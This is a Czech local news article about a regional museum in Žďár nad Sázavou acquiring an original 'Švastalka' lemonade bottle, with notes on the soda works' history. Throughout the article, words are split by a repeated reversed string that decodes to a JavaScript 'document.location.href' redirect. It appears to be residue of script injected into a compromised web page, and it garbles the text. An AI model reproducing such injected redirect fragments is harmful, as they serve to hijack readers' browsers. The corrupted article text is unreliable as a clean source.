Rainbow page separator

Do sbírek muzea se po letech dostala originální „Švastalka“

Čtvrtek, 28. ledna 2021

Žďár nad Sázavou / Láhev od limonády z období první republiky získalo do svých sbírek žďárské regionální muzeum; donedávna ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kousek spojený s místní his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torií v muzeu chyběl. Na skleněném povrchu lahve jsou vytlačena slova Čeněk Švastal a Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár, což je dokladem, že jde skutečně o láhev od počátku 20. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí populární limonády řečené „Švastalka“, kterou její výrobce Čeněk Švastal produkoval pod oficiálním označením Žďárka. Sodovkárnu majitel drogerie Čeněk Švastal založil společně s lékárníkem Theodorem Chleborádem.
Označení Žďárka zahrnovalo sodovky, sifony, limonády a ovocné šťávy v pěti druzích, přičemž jejich výroba se na základě zvýšené poptávky po [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokálním artiklu postupně modernizovala. Po znárodnění produkce limonád v různých částech Žďáru pokračovala až do počátku 90. let, nicméně pokus obnovit soukromou výrobu se poté nezdařil. Časem i původní originální lahve od Švastalovy sodovky zmizely ze starých půd, skládek a opuštěných domů. „Byl [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to malý zázrak, že jednu z posledních lahví nalezl Jaroslav Beránek, po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomek slavné sklářské rodiny Beránků ze Škrdlovic, na půdě svého domu ve Stržanově,“ přiblížil Miloslav Lopaur z Regionálního muzea města Žďáru nad Sázavou.